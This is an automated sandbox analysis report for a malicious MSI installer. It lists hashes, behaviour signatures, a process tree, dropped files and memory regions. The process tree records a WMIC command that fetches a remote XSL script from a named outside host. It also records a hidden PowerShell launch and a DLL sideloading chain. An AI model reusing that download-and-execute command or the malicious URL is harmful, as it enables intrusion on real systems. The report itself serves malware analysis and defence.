Overview

overview

10

Static

static

8

test/0b627...5b.doc

windows7_x64

10

test/0b627...5b.doc

windows10_x64

10

test/0dded...66.doc

windows7_x64

10

test/0dded...66.doc

windows10_x64

10

test/91B5D...9D.msi

windows7_x64

8

test/91B5D...9D.msi

windows10_x64

10

test/ed01e...aa.exe

windows7_x64

10

test/ed01e...aa.exe

windows10_x64

10

test/fe9d7...8f.exe

windows7_x64

10

test/fe9d7...8f.exe

windows10_x64

10

Analysis

  • max time kernel
    80s
  • max time network
    137s
  • platform
    windows10_x64
  • resource
    win10-en-20211104
  • submitted
    02-12-2021 11:58

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    test/91B5DB3C0CCBD68BD04C24571E27F99D.msi

  • Size

    277KB

  • MD5

    91b5db3c0ccbd68bd04c24571e27f99d

  • SHA1

    b01cb4fe38315d41fcbe9c6278ebe4574496ab0d

  • SHA256

    ec85138598c57c6a6bdb5ed470614f582d3b5a8c6b243eb2f41b9970ea13d130

  • SHA512

    9f0b07f961625fcc06ee64fcfe5e35e0d40db81f75c3cbc584434c1925fac241db69cac3c1a1bf329d965a4df9bdaa53c13bb8ea3206e2c9d4facf7f74ba21b7

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Executes dropped EXE 2 IoCs
  • Drops startup file 1 IoCs
  • Loads dropped DLL 6 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Windows directory 11 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\test\91B5DB3C0CCBD68BD04C24571E27F99D.msi
    1⤵
    • Enumerates connected drives
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:1900
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4336
    • C:\Windows\System32\MsiExec.exe
      C:\Windows\System32\MsiExec.exe -Embedding 369A2A74B5610B57ACFDB182A068E153
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of WriteProcessMemory
      PID:736
      • C:\Windows\System32\Wbem\WMIC.exe
        "C:\Windows\System32\Wbem\WMIC.exe" process get executablepath^,status /format:"http://barbosaoextra.com.br/dados/noticia/7/imagem/noar.xsl"
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3788
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\Admin.ps1" -WindowStyle Hidden
          4⤵
          • Blocklisted process makes network request
          • Drops startup file
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:400
          • C:\Users\Admin\AppData\Roaming\HAOsGt\nvsmartmaxapp.exe
            "C:\Users\Admin\AppData\Roaming\HAOsGt\nvsmartmaxapp.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:4752
            • C:\Program Files (x86)\Windows Media Player\wmplayer.exe
              "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
              6⤵
              • Loads dropped DLL
              PID:4432
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 652
                7⤵
                • Suspicious use of NtCreateProcessExOtherParentProcess
                • Program crash
                • Suspicious behavior: EnumeratesProcesses
                PID:2628
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 90D938907D219777DA79E28613009379
      2⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:976
      • C:\Users\Admin\AppData\Local\Temp\lcE753.tmp
        "C:\Users\Admin\AppData\Local\Temp\lcE753.tmp"
        3⤵
        • Executes dropped EXE
        PID:1400

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Admin.ps1
    MD5

    9a362dd5fb8679b63ca3996098a903ff

    SHA1

    f86f4bdc36538c666ed60c7ad2091b9e07b6c7e3

    SHA256

    30cc11279f166a46236eb838391df9d0d93fda8e818755a6fbe6168d13c7e8fc

    SHA512

    d805eb926fd611cf81834d2f6fb27f025954365b636bc536c83247611106110dc404cbf96ce79ec96d76db443bcc24681903b786813e6ae407c1df7a59b71452

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\lcE753.tmp
    MD5

    55ffee241709ae96cf64cb0b9a96f0d7

    SHA1

    b191810094dd2ee6b13c0d33458fafcd459681ae

    SHA256

    64bc6cf6b6e9850cea2a36cabc88982b0b936dd7f0bc169a2f6dd2a5d1e86abf

    SHA512

    01d05a5f34be950ec660af9e1de5c7d3c0e473f7815c2e13157c0b7bf162ca5a6b34fabc3704ba6e4fb339a53b1a20862fe984e16feca81f45cf4a0f98e01c07

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\lcE753.tmp
    MD5

    55ffee241709ae96cf64cb0b9a96f0d7

    SHA1

    b191810094dd2ee6b13c0d33458fafcd459681ae

    SHA256

    64bc6cf6b6e9850cea2a36cabc88982b0b936dd7f0bc169a2f6dd2a5d1e86abf

    SHA512

    01d05a5f34be950ec660af9e1de5c7d3c0e473f7815c2e13157c0b7bf162ca5a6b34fabc3704ba6e4fb339a53b1a20862fe984e16feca81f45cf4a0f98e01c07

    Download Submit

  • C:\Users\Admin\AppData\Roaming\HAOsGt\NvSmartMax
    MD5

    78ef53b2ad57536c74bbafece93a95e6

    SHA1

    4b23eb993a5853013911a0310c1cbb834500ba94

    SHA256

    371a793bdbe086871f1526000f878499b5fdd0426ffb6934745866483bbb6751

    SHA512

    182079daa43cf65d29d277274cdb78b3383a61a518237c65bf4dcc29ba71e147c425f097d4473fecd455f4f9ab44c316bf1e292d045529b167bb852cb1babe71

    Download Submit

  • C:\Users\Admin\AppData\Roaming\HAOsGt\NvSmartMax.dll
    MD5

    5b861438e716d7c47632c4922be36795

    SHA1

    499a5534020bd3ffa82097bf1edae7668367b6bc

    SHA256

    eb3514c05e4ad10610a1b2d5bb25565b01a577291b96c1d6122dec1acabc59c4

    SHA512

    9074e8bab59b1a45e44499389834503562f1b10b218d44b058e6d0c5643122fe5a2edfb369e00cc11b7c1ade39dd6e9f7df8547df192b2d68046adc6138118be

    Download Submit

  • C:\Users\Admin\AppData\Roaming\HAOsGt\nvsmartmaxapp.exe
    MD5

    df3e0e32d1e1fb50cc292aebc5e5b322

    SHA1

    12c93bb262696314123562f8a4b158074c9f6b95

    SHA256

    6a1f91b94bc6c7167967983a78aa1c8780decad66c278e3d7da5e8d4dbec4412

    SHA512

    71008d9cdea4331202ef4d6b68e23ceae8173d27b0c5a2ee01c6effa50a430c656fbf408197d82b08e58d66a77883ac74ad5a2ede1da8e48c8a3b24c8817072d

    Download Submit

  • C:\Users\Admin\AppData\Roaming\HAOsGt\nvsmartmaxapp.exe
    MD5

    df3e0e32d1e1fb50cc292aebc5e5b322

    SHA1

    12c93bb262696314123562f8a4b158074c9f6b95

    SHA256

    6a1f91b94bc6c7167967983a78aa1c8780decad66c278e3d7da5e8d4dbec4412

    SHA512

    71008d9cdea4331202ef4d6b68e23ceae8173d27b0c5a2ee01c6effa50a430c656fbf408197d82b08e58d66a77883ac74ad5a2ede1da8e48c8a3b24c8817072d

    Download Submit

  • C:\Windows\Installer\MSIDC67.tmp
    MD5

    9f1e5d66c2889018daef4aef604eebc4

    SHA1

    b80294261c8a1635e16e14f55a3d76889ff2c857

    SHA256

    02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

    SHA512

    8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

    Download Submit

  • C:\Windows\Installer\MSIE0BD.tmp
    MD5

    9f1e5d66c2889018daef4aef604eebc4

    SHA1

    b80294261c8a1635e16e14f55a3d76889ff2c857

    SHA256

    02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

    SHA512

    8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

    Download Submit

  • C:\Windows\Installer\MSIE736.tmp
    MD5

    9f1e5d66c2889018daef4aef604eebc4

    SHA1

    b80294261c8a1635e16e14f55a3d76889ff2c857

    SHA256

    02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

    SHA512

    8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

    Download Submit

  • C:\Windows\Installer\MSIED04.tmp
    MD5

    9f1e5d66c2889018daef4aef604eebc4

    SHA1

    b80294261c8a1635e16e14f55a3d76889ff2c857

    SHA256

    02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

    SHA512

    8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

    Download Submit

  • \Users\Admin\AppData\Roaming\HAOsGt\NvSmartMax.dll
    MD5

    5b861438e716d7c47632c4922be36795

    SHA1

    499a5534020bd3ffa82097bf1edae7668367b6bc

    SHA256

    eb3514c05e4ad10610a1b2d5bb25565b01a577291b96c1d6122dec1acabc59c4

    SHA512

    9074e8bab59b1a45e44499389834503562f1b10b218d44b058e6d0c5643122fe5a2edfb369e00cc11b7c1ade39dd6e9f7df8547df192b2d68046adc6138118be

    Download Submit

  • \Users\Admin\AppData\Roaming\HAOsGt\NvSmartMax.dll
    MD5

    5b861438e716d7c47632c4922be36795

    SHA1

    499a5534020bd3ffa82097bf1edae7668367b6bc

    SHA256

    eb3514c05e4ad10610a1b2d5bb25565b01a577291b96c1d6122dec1acabc59c4

    SHA512

    9074e8bab59b1a45e44499389834503562f1b10b218d44b058e6d0c5643122fe5a2edfb369e00cc11b7c1ade39dd6e9f7df8547df192b2d68046adc6138118be

    Download Submit

  • \Windows\Installer\MSIDC67.tmp
    MD5

    9f1e5d66c2889018daef4aef604eebc4

    SHA1

    b80294261c8a1635e16e14f55a3d76889ff2c857

    SHA256

    02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

    SHA512

    8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

    Download Submit

  • \Windows\Installer\MSIE0BD.tmp
    MD5

    9f1e5d66c2889018daef4aef604eebc4

    SHA1

    b80294261c8a1635e16e14f55a3d76889ff2c857

    SHA256

    02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

    SHA512

    8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

    Download Submit

  • \Windows\Installer\MSIE736.tmp
    MD5

    9f1e5d66c2889018daef4aef604eebc4

    SHA1

    b80294261c8a1635e16e14f55a3d76889ff2c857

    SHA256

    02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

    SHA512

    8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

    Download Submit

  • \Windows\Installer\MSIED04.tmp
    MD5

    9f1e5d66c2889018daef4aef604eebc4

    SHA1

    b80294261c8a1635e16e14f55a3d76889ff2c857

    SHA256

    02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

    SHA512

    8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

    Download Submit

  • memory/400-144-0x000001FE4F700000-0x000001FE4F701000-memory.dmp

    Filesize

    4KB

    Download

  • memory/400-165-0x000001FE4F776000-0x000001FE4F778000-memory.dmp

    Filesize

    8KB

    Download

  • memory/400-137-0x000001FE357E0000-0x000001FE357E2000-memory.dmp

    Filesize

    8KB

    Download

  • memory/400-206-0x000001FE4F779000-0x000001FE4F77F000-memory.dmp

    Filesize

    24KB

    Download

  • memory/400-133-0x0000000000000000-mapping.dmp

    Download

  • memory/400-141-0x000001FE357E0000-0x000001FE357E2000-memory.dmp

    Filesize

    8KB

    Download

  • memory/400-204-0x000001FE357E0000-0x000001FE357E2000-memory.dmp

    Filesize

    8KB

    Download

  • memory/400-142-0x000001FE357E0000-0x000001FE357E2000-memory.dmp

    Filesize

    8KB

    Download

  • memory/400-143-0x000001FE357E0000-0x000001FE357E2000-memory.dmp

    Filesize

    8KB

    Download

  • memory/400-195-0x000001FE357E0000-0x000001FE357E2000-memory.dmp

    Filesize

    8KB

    Download

  • memory/400-145-0x000001FE357E0000-0x000001FE357E2000-memory.dmp

    Filesize

    8KB

    Download

  • memory/400-146-0x000001FE357E0000-0x000001FE357E2000-memory.dmp

    Filesize

    8KB

    Download

  • memory/400-147-0x000001FE50560000-0x000001FE50561000-memory.dmp

    Filesize

    4KB

    Download

  • memory/400-173-0x000001FE357E0000-0x000001FE357E2000-memory.dmp

    Filesize

    8KB

    Download

  • memory/400-149-0x000001FE357E0000-0x000001FE357E2000-memory.dmp

    Filesize

    8KB

    Download

  • memory/400-153-0x000001FE4F770000-0x000001FE4F772000-memory.dmp

    Filesize

    8KB

    Download

  • memory/400-154-0x000001FE4F773000-0x000001FE4F775000-memory.dmp

    Filesize

    8KB

    Download

  • memory/400-136-0x000001FE357E0000-0x000001FE357E2000-memory.dmp

    Filesize

    8KB

    Download

  • memory/400-172-0x000001FE357E0000-0x000001FE357E2000-memory.dmp

    Filesize

    8KB

    Download

  • memory/400-196-0x000001FE357E0000-0x000001FE357E2000-memory.dmp

    Filesize

    8KB

    Download

  • memory/400-166-0x000001FE4F778000-0x000001FE4F779000-memory.dmp

    Filesize

    4KB

    Download

  • memory/400-171-0x000001FE357E0000-0x000001FE357E2000-memory.dmp

    Filesize

    8KB

    Download

  • memory/736-124-0x000001E8F8530000-0x000001E8F8532000-memory.dmp

    Filesize

    8KB

    Download

  • memory/736-123-0x000001E8F8530000-0x000001E8F8532000-memory.dmp

    Filesize

    8KB

    Download

  • memory/736-122-0x0000000000000000-mapping.dmp

    Download

  • memory/976-126-0x0000000000000000-mapping.dmp

    Download

  • memory/976-128-0x00000000001C0000-0x00000000001C1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/976-127-0x00000000001C0000-0x00000000001C1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1400-138-0x0000000000000000-mapping.dmp

    Download

  • memory/1900-118-0x000001C98AFC0000-0x000001C98AFC2000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1900-119-0x000001C98AFC0000-0x000001C98AFC2000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3788-125-0x0000000000000000-mapping.dmp

    Download

  • memory/4336-121-0x000002458F140000-0x000002458F142000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4336-120-0x000002458F140000-0x000002458F142000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4432-207-0x0000000000000000-mapping.dmp

    Download

  • memory/4752-200-0x0000000000000000-mapping.dmp

    Download